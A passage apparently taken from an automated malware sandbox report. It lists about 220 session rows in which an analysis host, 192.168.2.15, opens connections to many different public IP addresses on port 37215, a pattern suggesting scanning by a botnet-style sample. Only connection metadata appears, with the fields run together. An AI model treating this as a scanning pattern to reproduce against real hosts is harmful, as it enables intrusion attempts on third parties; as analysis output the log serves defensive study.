                                              15554192.168.2.1545810222.64.28.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15555192.168.2.1551224222.151.31.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15556192.168.2.1534478157.254.223.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15557192.168.2.1546758190.50.65.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15558192.168.2.1560702102.233.113.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15559192.168.2.1539222138.12.164.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15560192.168.2.1549784157.192.239.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15561192.168.2.155749494.151.143.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15562192.168.2.1546476186.67.155.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15563192.168.2.1546568222.219.250.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15564192.168.2.1533690121.46.200.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15565192.168.2.1552224197.232.110.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15566192.168.2.1541430211.18.227.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15567192.168.2.1535278222.182.2.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15568192.168.2.156082631.143.169.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15569192.168.2.1543414186.29.254.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15570192.168.2.1559436190.110.211.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15571192.168.2.1534624190.123.51.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15572192.168.2.154932631.21.243.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15573192.168.2.1550096156.8.18.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15574192.168.2.1546584181.54.162.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15575192.168.2.153708441.32.182.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15576192.168.2.1545886157.79.88.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15577192.168.2.1535494222.204.50.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15578192.168.2.1536892197.140.153.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15579192.168.2.1538886190.193.180.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15580192.168.2.1556362222.60.249.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15581192.168.2.154340841.4.49.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15582192.168.2.1537020102.58.216.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15583192.168.2.1556556121.77.110.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15584192.168.2.1536808181.142.52.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15585192.168.2.153773031.3.38.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15586192.168.2.1559016121.214.122.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15587192.168.2.1552990190.21.199.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15588192.168.2.1553450156.63.62.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15589192.168.2.1545822190.170.37.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15590192.168.2.154516237.196.249.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15591192.168.2.1550660161.114.171.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15592192.168.2.1557610156.55.1.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15593192.168.2.153759445.101.72.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15594192.168.2.1544170138.33.229.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15595192.168.2.1541380197.228.175.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15596192.168.2.1554346181.233.55.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15597192.168.2.1560904178.56.214.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15598192.168.2.1540534157.6.243.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15599192.168.2.1552784222.203.35.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15600192.168.2.1557518157.188.48.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15601192.168.2.1532962121.12.204.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15602192.168.2.154743237.241.198.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15603192.168.2.155552637.176.192.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15604192.168.2.155307494.163.105.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15605192.168.2.1554574156.182.71.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15606192.168.2.1545462122.74.175.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15607192.168.2.1555276138.156.204.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15608192.168.2.153718631.159.65.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15609192.168.2.1560624197.108.234.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15610192.168.2.1542686222.174.1.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15611192.168.2.1543862156.225.45.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15612192.168.2.1545174222.134.20.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15613192.168.2.1553742156.102.227.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15614192.168.2.1541784102.232.209.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15615192.168.2.1558500190.225.251.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15616192.168.2.153878241.234.162.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15617192.168.2.1557476181.234.139.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15618192.168.2.1542830122.148.251.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15619192.168.2.1542060102.53.173.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15620192.168.2.154643494.134.60.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15621192.168.2.1554954156.1.250.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15622192.168.2.1534112157.81.0.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15623192.168.2.1541800190.222.164.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15624192.168.2.1550636186.228.219.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15625192.168.2.1552604190.120.11.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15626192.168.2.1543028122.232.96.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15627192.168.2.1554240197.239.190.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15628192.168.2.153694031.168.79.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15629192.168.2.155352654.128.26.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15630192.168.2.153866441.124.169.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15631192.168.2.1548878222.191.253.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15632192.168.2.1541674186.137.248.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15633192.168.2.155490477.81.101.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15634192.168.2.1556674209.63.13.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15635192.168.2.1545982157.137.180.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15636192.168.2.1534184197.90.179.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15637192.168.2.1558484186.47.144.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15638192.168.2.154691437.179.19.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15639192.168.2.153311631.248.75.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15640192.168.2.1543814122.136.91.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15641192.168.2.1556360121.58.232.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15642192.168.2.1543302222.176.72.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15643192.168.2.153748437.4.60.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15644192.168.2.1548216190.227.37.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15645192.168.2.1544168181.96.7.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15646192.168.2.155092894.143.51.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15647192.168.2.1545976122.71.85.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15648192.168.2.1558694157.163.160.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15649192.168.2.1545544222.100.215.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15650192.168.2.1548610222.232.202.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15651192.168.2.1557792102.241.184.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15652192.168.2.1549088186.159.17.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15653192.168.2.1552028181.0.34.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15654192.168.2.1537916190.88.64.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15655192.168.2.154465631.7.135.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15656192.168.2.1545662102.229.193.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15657192.168.2.1547020186.135.21.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15658192.168.2.1549172156.237.169.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15659192.168.2.155998037.3.31.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15660192.168.2.1536338186.221.198.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15661192.168.2.1547918157.142.53.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15662192.168.2.1539688113.138.97.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15663192.168.2.1544774102.125.96.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15664192.168.2.1541308222.159.217.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15665192.168.2.1536010102.228.247.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15666192.168.2.154003241.173.23.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15667192.168.2.153795241.219.182.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15668192.168.2.155197045.34.201.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15669192.168.2.1544170122.211.59.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15670192.168.2.154417694.26.190.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15671192.168.2.154002231.158.114.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15672192.168.2.1540522157.56.89.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15673192.168.2.155337641.250.239.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15674192.168.2.1548530122.192.8.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15675192.168.2.153933441.193.235.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15676192.168.2.154297641.25.29.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15677192.168.2.1559724181.46.136.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15678192.168.2.1554918222.188.253.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15679192.168.2.1557822190.176.37.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15680192.168.2.1543136138.44.87.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15681192.168.2.1532978122.44.56.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15682192.168.2.154725245.15.82.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15683192.168.2.1548408122.209.209.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15684192.168.2.1540278222.55.224.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15685192.168.2.1555482190.219.183.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15686192.168.2.1555758122.251.22.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15687192.168.2.1556230122.176.241.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15688192.168.2.1554274186.14.36.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15689192.168.2.1537668138.132.99.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15690192.168.2.153699041.160.90.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15691192.168.2.1551430121.13.227.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15692192.168.2.1540548172.91.22.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15693192.168.2.1550226222.27.234.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15694192.168.2.1558732197.231.104.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15695192.168.2.1556476197.189.117.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15696192.168.2.1537924190.73.14.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15697192.168.2.1534036156.110.6.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15698192.168.2.1544996102.122.249.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15699192.168.2.154594241.181.243.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15700192.168.2.1553704157.171.20.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15701192.168.2.154035231.42.164.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15702192.168.2.1541908157.41.226.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15703192.168.2.154548894.78.124.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15704192.168.2.1547462138.26.87.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15705192.168.2.1541500122.212.53.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15706192.168.2.1556902102.193.133.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15707192.168.2.1550820190.137.93.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15708192.168.2.153882063.171.237.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15709192.168.2.153687031.161.120.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15710192.168.2.153750037.76.176.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15711192.168.2.153501231.174.216.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15712192.168.2.1544696190.251.189.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15713192.168.2.156013041.222.69.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15714192.168.2.154918631.148.33.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15715192.168.2.1547534122.179.76.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15716192.168.2.153327041.90.177.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15717192.168.2.154878641.65.58.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15718192.168.2.153450645.116.97.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15719192.168.2.1534928181.72.3.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15720192.168.2.1541286156.140.191.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15721192.168.2.1533904181.60.175.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15722192.168.2.154219694.105.122.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15723192.168.2.1552046138.50.68.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15724192.168.2.154212645.156.163.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15725192.168.2.1552378135.30.41.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15726192.168.2.1537998181.76.87.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15727192.168.2.154834437.99.61.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15728192.168.2.1542064156.206.143.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15729192.168.2.1558024122.103.254.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15730192.168.2.1553882190.252.173.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15731192.168.2.154876241.135.111.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15732192.168.2.1558366197.92.4.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15733192.168.2.1552620206.121.28.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15734192.168.2.1534698122.1.202.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15735192.168.2.1539724122.87.95.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15736192.168.2.154209294.20.182.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15737192.168.2.153967094.6.158.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15738192.168.2.153473094.205.165.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15739192.168.2.1539784190.81.12.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15740192.168.2.1539424156.114.219.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15741192.168.2.1547740190.106.214.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15742192.168.2.156028845.68.158.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15743192.168.2.1544018156.49.250.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15744192.168.2.1558836222.90.120.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15745192.168.2.1534302138.180.240.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15746192.168.2.1549976138.89.1.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15747192.168.2.1555742197.26.213.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15748192.168.2.1556098156.185.253.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15749192.168.2.153369294.114.80.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15750192.168.2.1533522222.80.149.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15751192.168.2.155772045.64.137.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15752192.168.2.154417831.89.121.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15753192.168.2.1558034156.147.245.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15754192.168.2.15511462.144.42.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15755192.168.2.155383237.72.224.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15756192.168.2.155865037.156.99.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15757192.168.2.155087641.188.237.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15758192.168.2.153980441.30.45.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15759192.168.2.154848845.169.210.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15760192.168.2.1536790157.2.63.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15761192.168.2.1553392102.238.89.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15762192.168.2.1533070197.127.167.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15763192.168.2.1547980181.76.94.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15764192.168.2.1541676121.44.123.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15765192.168.2.154265831.73.152.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15766192.168.2.154052837.34.89.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15767192.168.2.1549202122.169.78.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15768192.168.2.1559712181.210.239.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15769192.168.2.1541214186.226.124.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15770192.168.2.1552490222.31.215.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15771192.168.2.1551984222.240.74.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15772192.168.2.1560182121.84.128.14837215
